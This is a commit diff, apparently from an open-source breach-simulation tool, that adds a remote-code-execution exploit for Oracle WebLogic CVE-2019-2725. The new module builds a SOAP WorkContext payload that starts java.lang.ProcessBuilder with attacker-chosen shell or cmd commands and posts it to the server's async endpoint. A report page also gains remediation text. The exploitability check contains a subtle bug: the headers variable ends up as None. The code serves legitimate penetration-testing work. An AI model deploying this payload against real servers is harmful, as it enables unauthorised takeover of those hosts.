WebLogic CVE-2019-2725 implemented

2019-06-18 13:38:05 +03:00 · 2019-06-18 13:38:05 +03:00 · d0d0f13a43
parent c117e59672
commit d0d0f13a43
2 changed files with 115 additions and 28 deletions
--- a/monkey/infection_monkey/exploit/weblogic.py
+++ b/monkey/infection_monkey/exploit/weblogic.py
@ -14,6 +14,7 @@ from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
 import threading
 import logging
 import time
+import copy

 __author__ = "VakarisZ"

@ -21,28 +22,28 @@ LOG = logging.getLogger(__name__)
 # How long server waits for get request in seconds
 SERVER_TIMEOUT = 4
 # How long should be wait after each request in seconds
-REQUEST_DELAY = 0.0001
+REQUEST_DELAY = 0.1
 # How long to wait for a sign(request from host) that server is vulnerable. In seconds
 REQUEST_TIMEOUT = 5
 # How long to wait for response in exploitation. In seconds
 EXECUTION_TIMEOUT = 15
-URLS = ["/wls-wsat/CoordinatorPortType",
-        "/wls-wsat/CoordinatorPortType11",
-        "/wls-wsat/ParticipantPortType",
-        "/wls-wsat/ParticipantPortType11",
-        "/wls-wsat/RegistrationPortTypeRPC",
-        "/wls-wsat/RegistrationPortTypeRPC11",
-        "/wls-wsat/RegistrationRequesterPortType",
-        "/wls-wsat/RegistrationRequesterPortType11"]
-# Malicious request's headers:
-HEADERS = {
-            "Content-Type": "text/xml;charset=UTF-8",
-            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) "
-                          "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
-          }


 class WebLogicExploiter(WebRCE):
+    URLS = ["/wls-wsat/CoordinatorPortType",
+            "/wls-wsat/CoordinatorPortType11",
+            "/wls-wsat/ParticipantPortType",
+            "/wls-wsat/ParticipantPortType11",
+            "/wls-wsat/RegistrationPortTypeRPC",
+            "/wls-wsat/RegistrationPortTypeRPC11",
+            "/wls-wsat/RegistrationRequesterPortType",
+            "/wls-wsat/RegistrationRequesterPortType11"]
+    # Malicious request's headers:
+    HEADERS = {
+        "Content-Type": "text/xml;charset=UTF-8",
+        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) "
+                      "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
+    }
    _TARGET_OS_TYPE = ['linux', 'windows']
    _EXPLOITED_SERVICE = 'Weblogic'

@ -55,19 +56,29 @@ class WebLogicExploiter(WebRCE):
        exploit_config = super(WebLogicExploiter, self).get_exploit_config()
        exploit_config['blind_exploit'] = True
        exploit_config['stop_checking_urls'] = True
-        exploit_config['url_extensions'] = URLS
+        exploit_config['url_extensions'] = WebLogicExploiter.URLS
        return exploit_config

+    def exploit_host(self):
+        exploiters = [WebLogic20192725]
+        for exploiter in exploiters:
+            if exploiter(self.host).exploit_host():
+                return True
+        if super(WebLogicExploiter, self).exploit_host():
+            return True
+        else:
+            return False
+
    def exploit(self, url, command):
        if 'linux' in self.host.os['type']:
            payload = self.get_exploit_payload('/bin/sh', '-c', command + ' 1> /dev/null 2> /dev/null')
        else:
            payload = self.get_exploit_payload('cmd', '/c', command + ' 1> NUL 2> NUL')
        try:
-            post(url, data=payload, headers=HEADERS, timeout=EXECUTION_TIMEOUT, verify=False)
+            post(url, data=payload, headers=WebLogicExploiter.HEADERS, timeout=EXECUTION_TIMEOUT, verify=False)
        except Exception as e:
-            print('[!] Connection Error')
-            print(e)
+            LOG.error("Connection error: %s" % e)
+            return False

        return True

@ -100,7 +111,7 @@ class WebLogicExploiter(WebRCE):
    def check_if_exploitable_weblogic(self, url, httpd):
        payload = self.get_test_payload(ip=httpd.local_ip, port=httpd.local_port)
        try:
-            post(url, data=payload, headers=HEADERS, timeout=REQUEST_DELAY, verify=False)
+            post(url, data=payload, headers=WebLogicExploiter.HEADERS, timeout=REQUEST_DELAY, verify=False)
        except exceptions.ReadTimeout:
            # Our request will not get response thus we get ReadTimeout error
            pass
@ -224,3 +235,82 @@ class WebLogicExploiter(WebRCE):

        def stop(self):
            self._stopped = True
+
+
+# Exploit based of:
+# Andres Rodriguez (acamro)
+# https://github.com/rapid7/metasploit-framework/pull/11780
+class WebLogic20192725(WebRCE):
+    URLS = ["_async/AsyncResponseServiceHttps"]
+
+    _TARGET_OS_TYPE = ['linux', 'windows']
+    _EXPLOITED_SERVICE = 'Weblogic'
+
+    def __init__(self, host):
+        super(WebLogic20192725, self).__init__(host)
+
+    def get_exploit_config(self):
+        exploit_config = super(WebLogic20192725, self).get_exploit_config()
+        exploit_config['url_extensions'] = WebLogic20192725.URLS
+        exploit_config['blind_exploit'] = True
+        exploit_config['dropper'] = True
+        return exploit_config
+
+    def exploit(self, url, command):
+        if 'linux' in self.host.os['type']:
+            payload = self.get_exploit_payload('/bin/sh', '-c', command)
+        else:
+            payload = self.get_exploit_payload('cmd', '/c', command)
+        try:
+            resp = post(url, data=payload, headers=WebLogicExploiter.HEADERS, timeout=EXECUTION_TIMEOUT)
+            return resp
+        except Exception as e:
+            LOG.error("Connection error: %s" % e)
+            return False
+
+    def check_if_exploitable(self, url):
+        headers = copy.deepcopy(WebLogicExploiter.HEADERS).update({'SOAPAction': ''})
+        res = post(url, headers=headers, timeout=EXECUTION_TIMEOUT)
+        if res.status_code == 500 and "<faultcode>env:Client</faultcode>" in res.text:
+            return True
+        else:
+            return False
+
+    @staticmethod
+    def get_exploit_payload(cmd_base, cmd_opt, command):
+        """
+        Formats the payload used to exploit weblogic servers
+        :param cmd_base: What command prompt to use eg. cmd
+        :param cmd_opt: cmd_base commands parameters. eg. /c (to run command)
+        :param command: command itself
+        :return: Formatted payload
+        """
+        empty_payload = '''
+        <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" 
+        xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\">
+            <soapenv:Header>
+                <wsa:Action>xx</wsa:Action>
+                <wsa:RelatesTo>xx</wsa:RelatesTo>
+                <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">
+                    <void class=\"java.lang.ProcessBuilder\">
+                        <array class=\"java.lang.String\" length=\"3\">
+                            <void index=\"0\">
+                                <string>{cmd_base}</string>
+                            </void>
+                            <void index=\"1\">
+                                <string>{cmd_opt}</string>
+                            </void>
+                            <void index=\"2\">
+                                <string>{cmd_payload}</string>
+                            </void>
+                        </array>
+                        <void method=\"start\"/>
+                    </void>
+                </work:WorkContext>
+            </soapenv:Header>
+            <soapenv:Body>
+                <asy:onAsyncDelivery/>
+            </soapenv:Body>
+        </soapenv:Envelope>'''
+        payload = empty_payload.format(cmd_base=cmd_base, cmd_opt=cmd_opt, cmd_payload=command)
+        return payload
--- a/monkey/monkey_island/cc/ui/src/components/pages/ReportPage.js
+++ b/monkey/monkey_island/cc/ui/src/components/pages/ReportPage.js
@ -308,7 +308,7 @@ class ReportPageComponent extends AuthComponent {
                    }).length} threats</span>:
                <ul>
                  {this.state.report.overview.issues[this.Issue.STOLEN_SSH_KEYS] ?
-                    <li>Stolen SSH keys are used to exploit other machines.</li> : null }                  
+                    <li>Stolen SSH keys are used to exploit other machines.</li> : null }
                  {this.state.report.overview.issues[this.Issue.STOLEN_CREDS] ?
                    <li>Stolen credentials are used to exploit other machines.</li> : null}
                  {this.state.report.overview.issues[this.Issue.ELASTIC] ?
@ -889,16 +889,13 @@ class ReportPageComponent extends AuthComponent {
  generateWebLogicIssue(issue) {
    return (
      <li>
-        Install Oracle <a href="http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html">
-        critical patch updates.</a> Or update to the latest version. Vulnerable versions are
-        10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.
+        Update Oracle WebLogic server to the latest supported version.
        <CollapsibleWellComponent>
          Oracle WebLogic server at <span className="label label-primary">{issue.machine}</span> (<span
-          className="label label-info" style={{margin: '2px'}}>{issue.ip_address}</span>) is vulnerable to <span
-          className="label label-danger">remote code execution</span> attack.
+          className="label label-info" style={{margin: '2px'}}>{issue.ip_address}</span>) is vulnerable to one of <span
+          className="label label-danger">remote code execution</span> attacks.
          <br/>
-          The attack was made possible due to incorrect permission assignment in Oracle Fusion Middleware
-          (subcomponent: WLS Security).
+          The attack was made possible due to one of the following vulnerabilities: CVE-2017-10271 or CVE-2019-2725
        </CollapsibleWellComponent>
      </li>
    );